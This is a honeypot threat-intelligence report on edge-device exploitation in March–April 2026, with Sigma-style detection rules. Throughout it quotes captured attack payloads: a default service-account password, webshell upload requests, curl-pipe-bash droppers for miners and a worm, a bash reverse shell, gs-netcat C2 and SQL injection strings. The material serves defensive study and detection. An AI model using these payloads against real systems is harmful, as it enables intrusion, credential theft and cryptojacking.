Edge Device Exploit Trends: Honeypot Analysis

Data: Defused Cyber honeypot telemetry (25 decoy types) · Period: Mar 14 – Apr 13, 2026 · 15,001 exploit attempts · Generated: 2026-04-13

15.0k

Exploit attempts

Decoy types

40+

CVEs targeted

1,260

SD-WAN chain

8,112

CitrixBleed 2

514

Shell eval payloads

Detection Chokepoint Framework

Every exploit in this dataset (Cisco SD-WAN, Citrix, SonicWall, Fortinet) follows the same chain. The CVE changes. The tooling changes. The five stages don't. Each badge maps to the ATT&CK technique you're detecting at that stage.

Recon / Fingerprint

Scanners probe for version, endpoint presence

T1595 RECON

›

Auth bypass / Memory leak

Exploit hits auth endpoint to gain access or leak tokens

T1190 AUTH BYPASS

›

Credential / Config harvest

Read DCA creds, session tokens, admin configs

T1555 CRED HARVEST

›

Webshell / Payload deploy

Upload .war, drop shell, path-traversal write

T1505 WEBSHELL

›

Post-exploit

Cryptominer, reverse shell, lateral movement

T1059 POST-EXPLOIT

Authentication bypass, credential harvest, and webshell deployment: those three stages are where your detection budget compounds. Recon scanning generates volume but the attacker can change tools and IPs freely. Post-exploit behavior matters but varies by environment. The middle three are the invariants.

Monthly Volume: Daily Exploit Attempts

Daily hit volume across 22 decoy types. The spikes aren't gradual trends. They're specific campaigns lighting up.

Daily exploit attempts. Mar 14 to Apr 13, 2026

Three stories dominate this window. April 6 was the peak day at 1,862 hits, driven almost entirely by CitrixBleed 2 with new operators joining daily. April 2 (1,807) and April 9 (1,018) were close behind. March 17 (1,194) was a concentrated SD-WAN burst. The new story: SAP lit up Apr 9–11 with a 1,024-hit burst on a 4-year-old CVSS 10.0 vulnerability, 176 unique IPs in 72 hours. CitrixBleed 2 now accounts for 54% of all traffic in this window, and the operator count keeps growing.

Target Distribution: What Adversaries Are Hunting

Not every decoy gets the same attention. Citrix and SD-WAN absorb 74% of all traffic, and for different reasons.

Citrix NetScaler

8,662

Cisco SD-WAN

1,260

SAP Netweaver

1,179

FortiWeb

1,027

React Server

818

Ivanti Connect Secure

734

SonicWall SMA

478

FortiClient EMS

291

Citrix dominates at 8,662 hits, 57.7% of all traffic, driven by a concentrated cluster of IPs running CitrixBleed 2 continuously. SAP jumped to third this window (was barely visible before). A 72-hour burst Apr 9–11 on a 4-year-old CVSS 10.0 vuln accounted for most of it. SonicWall has the most distributed attacker base at 284 unique IPs, suggesting toolkit proliferation rather than a single operator campaign.

CVE-2026-20127: Full Kill Chain in Honeypot Data

CVSS 10.0 authentication bypass in Cisco Catalyst SD-WAN. Disclosed Feb 25, 2026. CISA KEV with 24-hour remediation. We captured the full attack chain: 137 IPs progressing from recon through auth bypass, webshell upload, and cryptominer deployment.

Attack Chain Stages: Observed in Honeypot

Stage	Alert	Hits	Unique IPs	Key Artifact
RECON	Associated with CVE-2026-20127	2,475	189	`cmd.jsp` probe, `.dca` credential read
AUTH	CVE-2026-20127 [First Part]	664	123	`POST /jts/authenticated/j_security_check`
UPLOAD	CVE-2026-20127 [Upload]	111	44	Path traversal → `.war` webshell deploy
EXEC	Webshell command execution	1,780	-	`POST /cmd.gz/cmd.jsp`

Auth Bypass: Hardcoded DCA Credentials

The "First Part" stage sends authentication requests using the viptela-reserved-dca service account, a default internal account used by the Data Collection Agent.

# Auth bypass via default service account
POST /jts/authenticated/j_security_check
Content-Type: application/x-www-form-urlencoded
User-Agent: python-requests/2.32.5

j_username=viptela-reserved-dca&j_password=9i9Q6TE1TYVMdUu6ULw9W5kkSoaP6Czk

Webshell Upload: Path Traversal to Wildfly

Post-authentication, attackers exploit the /dataservice/smartLicensing/uploadAck endpoint to upload .war files via path traversal into the Wildfly deployment directory.

# Webshell upload via path traversal
POST /dataservice/smartLicensing/uploadAck
Content-Type: multipart/form-data

filename="../../../../../../../../../../../var/lib/wildfly/standalone/deployments/cmd.gz.war"

Webshell Commands: Post-Exploit Activity

Once the webshell is deployed at /cmd.gz/cmd.jsp, attackers execute commands through POST requests. The command breakdown reveals a clear operational progression: enumeration → miner deployment → persistence.

Count	Command	Purpose
819	`id`	User context check
372	`curl -s -Lk hxxps[://]103[.]98[.]152[.]233/wp_plugins/kernel.sh \| bash`	MINER Custom kernel payload
196	`whoami`	User context check
37	`curl -s -L hxxps[://]raw[.]githubusercontent[.]com/.../setup_moneroocean_miner.sh \| bash`	MINER XMRig via MoneroOcean
15	`curl -sLk hxxp[://]83[.]142[.]209[.]47/x \| bash`	BOTNET Unknown payload
10	`curl -s -Lk hxxps[://]miso88[.]tech/wp-config/x \| bash`	BOTNET Compromised WP staging
6	`uname -a;cat /etc/shadow;cat /etc/passwd;ifconfig -a;...`	RECON Full system enumeration
5	`gs-netcat_linux-x86_64 -s kikdddsdsrrds -l -i`	C2 Global Socket reverse shell

Most of this is cryptomining. Watch the outliers. 819 id commands, 372 XMRig deployments: noisy, opportunistic, easy to catch. But 6 IPs ran full system enumeration and 5 deployed gs-netcat reverse shells. Those are the ones that matter.

Credential Harvesting: DCA Config Files

739 requests targeted the .dca (Data Collection Agent) configuration file. This file contains credentials used by the DCA service to authenticate to vManage. Harvesting this file gives attackers legitimate credentials for lateral movement within the SD-WAN fabric.

CVE-2025-5777: CitrixBleed 2 (T1190 Pre-Auth Memory Disclosure)

Same vulnerability class as the original CitrixBleed that hit Boeing and ICBC. Pre-auth memory disclosure, ~127 bytes per request, session tokens leak out. The exploit is trivial: a 5-byte POST body with the word login. This window: 8,112 hits, 54% of all traffic, still growing.

Exploitation Pattern

All 8,112 hits target a single endpoint: POST /p/u/doAuthentication.do with a malformed login parameter (no equals sign or value). 97% of traffic uses an identical truncated User-Agent string, indicating a shared exploit toolkit spreading to new operators.

# CitrixBleed 2 memory leak exploit
POST /p/u/doAuthentication.do HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 5

login

New operators every day, same toolkit. 163[.]245[.]210[.]213 leads at 2,136 hits across this window, grinding continuously. 91[.]92[.]243[.]126 (1,558) and 91[.]92[.]243[.]11 (1,129) are in the same /24 running in parallel. 69[.]169[.]107[.]93 (691), 64[.]20[.]48[.]21 (502), and 178[.]16[.]55[.]226 (452) all appeared in the Apr 2–6 burst. Apr 6 (1,726 CitrixBleed 2 hits) is the new single-day peak. This isn't one campaign. It's a toolkit that anyone can pick up.

CitrixBleed 2 Daily Exploitation Trend

CVE-2025-5777 daily exploitation. Mar 14 to Apr 13, 2026

CVE-2022-22536 + CVE-2025-31324: SAP Surge (Apr 9–11)

SAP jumped from a footnote to the third most targeted platform in this window. 1,179 total hits on SAP Netweaver decoys, driven by a concentrated 72-hour burst Apr 9–11 on CVE-2022-22536, a 2022 CVSS 10.0 memory corruption / request smuggling vulnerability in SAP ICM. An additional 155 hits targeted CVE-2025-31324, the critical SAP NetWeaver Visual Composer RCE disclosed in 2025.

CVE-2022-22536: 4-Year-Old CVSS 10.0 Still Under Active Exploitation

The Apr 9–11 burst hit 176 unique IPs in three days: concentrated scanning across a wide source range rather than a single operator. CVE-2022-22536 allows unauthenticated HTTP request smuggling against SAP ICM, enabling memory disclosure and session token theft without credentials. Patched in 2022. Still getting 1,024 hits in a 31-day window in 2026.

Date	Hits	CVE	Notes
Apr 9	337	`CVE-2022-22536`	Burst begins. 176 unique IPs
Apr 10	621	`CVE-2022-22536`	Peak day. Scanning at scale
Apr 11	66	`CVE-2022-22536`	Tail-off
Various	155	`CVE-2025-31324`	SAP NetWeaver Visual Composer RCE

Old CVEs don't retire. They get rediscovered. CVE-2022-22536 is 4 years old, CVSS 10.0, and requires no credentials. The Apr 9–11 burst pattern (176 IPs, 958 hits in 48 hours, then gone) matches a coordinated scanning campaign, not opportunistic noise. CVE-2019-11510 (Pulse Secure, 7 years old) and CVE-2018-13379 (FortiGate, 8 years old) also appear in this dataset. Patch age is not a proxy for exploitation risk.

CVE-2025-40599: SonicWall SMA Path Traversal + Self-Replicating Worm

478 attempts across 284 unique IPs targeting SonicWall SMA decoys via double-encoded path traversal to reach /bin/sh. Every request uses the libredtail-http User-Agent, a custom HTTP client not seen in any other campaign. 284 unique IPs is the most distributed attacker base of any campaign in this dataset.

# Path traversal to shell + self-replicating worm payload
POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh
User-Agent: libredtail-http
Content-Type: text/plain

(wget --no-check-certificate -qO- hxxps[://]31[.]57[.]216[.]121/sh || curl -sk hxxps[://]31[.]57[.]216[.]121/sh) | sh -s apache.selfrep

apache.selfrep: this payload spreads itself. The script takes apache.selfrep as an argument, with self-replication logic baked into the payload. The same staging IP (31[.]57[.]216[.]121) appears in both the SonicWall path traversal and the "Shell eval!" alerts across Ivanti, Citrix, and FortiClient EMS decoys, confirming a single worm operator targeting multiple edge device families simultaneously. All 30 shell eval hits still point to this same IP. The worm infrastructure remains active for the entire 31-day observation period.

CVE-2025-25257: FortiWeb Multi-Stage SQLi via Bearer Token

237 requests targeting FortiWeb's /api/fabric/device/status endpoint. Attackers embed SQL injection payloads inside the Authorization: Bearer header, an unusual injection point that bypasses WAF rules typically inspecting query parameters and POST bodies.

CVE-2026-21643: FortiClient EMS SQLi, New Operator Fingerprint (Apr 2)

FortiClient EMS SQLi jumped from 159 to 187 hits (+28 on Apr 2). A new operator fingerprint emerged: payloads containing alireza_cve_2026_21643_test appeared alongside the existing nuclei_cve_2026_21643_test pattern.

# New operator fingerprint: alireza variant (first seen Mar 29)
GET /api/v1/init_consts HTTP/1.1
User-Agent: python-requests/2.31.0
Site: x'; SELECT CAST('alireza_cve_2026_21643_test' AS int)--

# Original Nuclei operator (ongoing since March)
GET /api/v1/init_consts HTTP/1.1
User-Agent: Mozilla/5.0 (Ubuntu; Linux i686; rv:125.0)
Site: x'; SELECT CAST('nuclei_cve_2026_21643_test' AS int)--

Attack Progression

Step	Payload (in Bearer token)	Purpose
1	`bitsight-internet-census' or 'x'='x`	Auth bypass / boolean blind SQLi test
2	`SELECT a FROM fabric_user.a INTO OUTFILE '/var/log/lib/python3.10/pylab.py'`	Write webshell via SQL INTO OUTFILE
3-6	`UPDATE a SET a=(SELECT CONCAT(a, 0x...))`	Staged hex payload assembly into DB field

Bearer headers are a WAF blind spot. Most rules inspect URI paths, query strings, and POST bodies. The Authorization header gets passed through uninspected. The webshell lands in /var/log/lib/python3.10/pylab.py, a Python library path that won't trigger file integrity monitoring. If you're not inspecting auth headers for SQL metacharacters, you're missing this entire class.

CVE-2026-1281 / CVE-2026-1340: Ivanti EPMM Reverse Shell (Apr 3)

5 requests on Apr 3 targeting Ivanti EPMM via the /mifs/c/appstore/fob/ endpoint. The payload embeds a bash reverse shell directly in the URL path using backtick command injection inside the sha256 hash parameter.

# Decoded URI: reverse shell injected into app store download path
GET /mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue,et=1337133713,
  h=gPath[`bash -i >& /dev/tcp/5[.]255[.]120[.]46/5555 0>&1`]
  /13371337-1337-1337-1337-133713371337.ipa

# C2 callback: 5[.]255[.]120[.]46:5555
# Source IPs: 147[.]185[.]135[.]0/24 range (3 IPs), 185[.]190[.]141[.]49

PoC testing, not a mature campaign. Three IPs in the same /24, 1337 repeating in the GUID and epoch. This is someone running a proof of concept. The actionable IOC is 5[.]255[.]120[.]46:5555. Any outbound connection from an EPMM host to that address is confirmed compromise.

CVE-2019-19781: 6-Year-Old Citrix Vuln Still Getting Probed (Apr 3)

2 hits probing for CVE-2019-19781, a path traversal in Citrix ADC first disclosed December 2019. This CVE is 6+ years old and still being actively probed, reinforcing that edge device vulnerabilities have extremely long exploitation tails.

CVE-2025-64446: FortiWeb API Path Traversal (Apr 2 Spike)

FortiWeb path traversal exploitation jumped to 63 hits, with 22 new attempts on Apr 2 from two IPs in the same 101[.]71[.]38[.]0/24 netblock. The exploit abuses URL-encoded %3f (question mark) in the API path to traverse to /cgi-bin/fwbcgi.

# FortiWeb API path traversal via encoded ? character
GET /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Accept: application/json, text/javascript, */*; q=0.01

Attacker Tooling: Scanner & Automation Fingerprints

38.7% of traffic self-identifies via User-Agent. That's the floor. The other 61% spoof browser UAs but behave like bots.

python-requests

3,088

libredtail-http

442

Go-http-client

307

l9scan (LeakIX)

curl

ffuf

python-requests dominates at 78% of scanner-attributed traffic. libredtail-http is exclusively associated with the SonicWall worm campaign.

Multi-Device Operators: IPs Scanning Across Decoy Types

IP	Hits	Products Targeted	Significance
`47[.]253[.]5[.]130`	13	Cisco SD-WAN, Citrix, FortiClient, Ivanti, SonicWall	MULTI-EXPLOIT Broadest coverage
`144[.]31[.]4[.]70`	53	Citrix, FortiGate, FortiWeb, Palo Alto, SolarWinds	MULTI-EXPLOIT Fortinet-heavy
`82[.]165[.]66[.]87`	23	Citrix, FortiClient, Ivanti, SonicWall	MULTI-EXPLOIT Shell eval across all
`103[.]98[.]152[.]233`	327	Cisco SD-WAN (primary)	MINER OPS kernel.sh staging host
`176[.]65[.]139[.]31`	336	Cisco SD-WAN (primary)	MINER OPS Full chain: auth→upload→mine

Staging Infrastructure

Payload staging URLs extracted from webshell commands and shell eval payloads.

URL / IP	Payloads	Type	Blind Spot
`103[.]98[.]152[.]233/wp_plugins/kernel.sh`	386	MINER	Path mimics WordPress plugin directory
`31[.]57[.]216[.]121/sh`	687+	WORM	Self-replicating `apache.selfrep` payload
`raw[.]githubusercontent[.]com/.../setup_moneroocean_miner.sh`	37	MINER	Legitimate GitHub hosting. Cannot block domain
`83[.]142[.]209[.]47`	25	BOTNET	Serves `nullnet_bash.sh`. Botnet enrollment
`miso88[.]tech/wp-config/x`	10	BOTNET	Compromised domain, WP config path
`213[.]139[.]77[.]117:4433`	10	C2 CHECK	Port 4433 callback. Connectivity test before C2
`5[.]255[.]120[.]46:5555`	5	REVERSE SHELL	Ivanti EPMM bash reverse shell target (Apr 3)

You can't block GitHub. Detection has to be contextual. A network appliance fetching shell scripts from raw.githubusercontent.com and piping to bash is anomalous regardless of the domain reputation.

Detection Recommendations

Each detection maps to the technique it catches. The ones that survived every CVE rotation in this dataset are at the top.

T1190

Detect SD-WAN auth bypass via default service accounts

Alert on authentication attempts using viptela-reserved-dca or any viptela-reserved-* account from external IPs. These are internal service accounts. External auth requests are always malicious.

Observed payloads (1)

# 664 hits, 123 unique IPs. Default DCA service account, external source.
POST /jts/authenticated/j_security_check HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: python-requests/2.32.5

j_username=viptela-reserved-dca&j_password=9i9Q6TE1TYVMdUu6ULw9W5kkSoaP6Czk

Example detection logic

# Sigma-style detection
title: Cisco SD-WAN Auth Bypass via Default DCA Account
logsource:
  category: webserver
  product: cisco_sdwan
detection:
  selection:
    cs-uri-stem|contains: '/jts/authenticated/j_security_check'
    request_body|contains: 'viptela-reserved-dca'
  filter_internal:
    src_ip|cidr:
      - '10.0.0.0/8'
      - '172.16.0.0/12'
      - '192.168.0.0/16'
  condition: selection and not filter_internal
level: critical

T1505

Detect webshell upload via Wildfly deployment path traversal

Monitor for multipart uploads containing path traversal sequences targeting /var/lib/wildfly/standalone/deployments/.

Observed payloads (1)

# 111 upload attempts, 44 unique IPs. Path traversal deploys .war webshell at /cmd.gz.
POST /dataservice/smartLicensing/uploadAck HTTP/1.1
Content-Type: multipart/form-data

filename="../../../../../../../../../../../var/lib/wildfly/standalone/deployments/cmd.gz.war"

Example detection logic

# Sigma-style: Webshell upload to Wildfly
title: SD-WAN Webshell Upload via Path Traversal
logsource:
  category: webserver
detection:
  selection_endpoint:
    cs-uri-stem|contains: '/dataservice/smartLicensing/uploadAck'
    cs-method: 'POST'
  selection_traversal:
    request_body|contains:
      - '../../../'
      - 'deployments/'
      - '.war'
  condition: selection_endpoint and selection_traversal
level: critical

T1190

Detect CitrixBleed 2 memory leak exploitation

The exploit signature is highly specific: POST /p/u/doAuthentication.do with a body containing only login (no equals sign, no value). Legitimate authentication always includes login=username. Near-zero false positive potential.

Observed payloads (1)

# 8,112 hits, 54% of all traffic. 5-byte body, malformed login parameter.
POST /p/u/doAuthentication.do HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 5

login

Example detection logic

# Sigma-style: CitrixBleed 2 memory disclosure
title: Citrix NetScaler CVE-2025-5777 Memory Leak Attempt
logsource:
  category: webserver
  product: citrix_netscaler
detection:
  selection:
    cs-uri-stem: '/p/u/doAuthentication.do'
    cs-method: 'POST'
    sc-bytes|lt: 20
  condition: selection
level: critical
falsepositives:
  - None expected. Legitimate auth always includes credentials

T1190

Detect SQL injection in Authorization headers

The FortiWeb campaign embeds SQLi in Bearer tokens, a common WAF bypass. Inspect Authorization headers for SQL metacharacters.

Observed payloads (3)

# FortiWeb Bearer-token SQLi: auth bypass probe (boolean blind).
GET /api/fabric/device/status HTTP/1.1
Authorization: Bearer bitsight-internet-census' or 'x'='x

# FortiWeb Bearer-token SQLi: webshell drop via INTO OUTFILE.
GET /api/fabric/device/status HTTP/1.1
Authorization: Bearer ' UNION SELECT a FROM fabric_user.a INTO OUTFILE '/var/log/lib/python3.10/pylab.py'--

# FortiClient EMS SQLi: operator-fingerprint variant (Site header).
GET /api/v1/init_consts HTTP/1.1
User-Agent: python-requests/2.31.0
Site: x'; SELECT CAST('alireza_cve_2026_21643_test' AS int)--

Example detection logic

# Sigma-style: SQLi via Authorization header
title: SQL Injection in HTTP Authorization Header
logsource:
  category: webserver
detection:
  selection:
    cs-authorization|contains:
      - 'SELECT'
      - 'UNION'
      - 'INTO OUTFILE'
      - 'CONCAT'
      - '/**/'
      - "' or '"
  condition: selection
level: high

T1059

Detect edge devices fetching scripts and piping to shell

Network appliances should not execute wget|curl ... | sh chains. Monitor for outbound HTTP(S) from edge device management IPs followed by shell execution.

Observed payloads (5)

# 372 hits. XMRig miner delivery via direct-IP staging host.
curl -s -Lk hxxps[://]103[.]98[.]152[.]233/wp_plugins/kernel.sh | bash

# 37 hits. MoneroOcean miner via legitimate-looking GitHub raw path.
curl -s -L hxxps[://]raw[.]githubusercontent[.]com/.../setup_moneroocean_miner.sh | bash

# 15 hits. Unknown botnet payload over HTTP.
curl -sLk hxxp[://]83[.]142[.]209[.]47/x | bash

# 10 hits. Compromised WordPress site hosting second-stage dropper.
curl -s -Lk hxxps[://]miso88[.]tech/wp-config/x | bash

# SonicWall worm: self-replicating payload with wget/curl fallback.
(wget --no-check-certificate -qO- hxxps[://]31[.]57[.]216[.]121/sh || curl -sk hxxps[://]31[.]57[.]216[.]121/sh) | sh -s apache.selfrep

Example detection logic

# Sigma-style: Edge device pipe-to-shell
title: Edge Device Fetches Remote Script and Pipes to Shell
logsource:
  category: process_creation
  product: linux
detection:
  selection_fetch:
    CommandLine|contains:
      - 'wget'
      - 'curl'
  selection_pipe:
    CommandLine|contains:
      - '| sh'
      - '| bash'
      - '| /bin/sh'
  filter_package_managers:
    ParentImage|endswith:
      - '/apt'
      - '/yum'
      - '/dnf'
  condition: selection_fetch and selection_pipe and not filter_package_managers
level: high

INFRA

Monitor for DCA credential file access on SD-WAN

739 requests targeted the .dca config file path. Access to this file from any non-management IP indicates credential harvesting, the lateral movement enabler.

Observed payloads (2)

# 739 hits. Direct .dca config read, credentials used by DCA service to auth to vManage.
GET /data-collection-agent/.dca HTTP/1.1
User-Agent: python-requests/2.32.5

# Related probe for DCA config directory.
GET /config/data-collection-agent/ HTTP/1.1
User-Agent: python-requests/2.32.5

Example detection logic

# Sigma-style: DCA credential file access
title: Cisco SD-WAN DCA Config File Access
logsource:
  category: webserver
  product: cisco_sdwan
detection:
  selection:
    cs-uri-stem|contains:
      - '/data-collection-agent/.dca'
      - '/config/data-collection-agent/'
  condition: selection
level: critical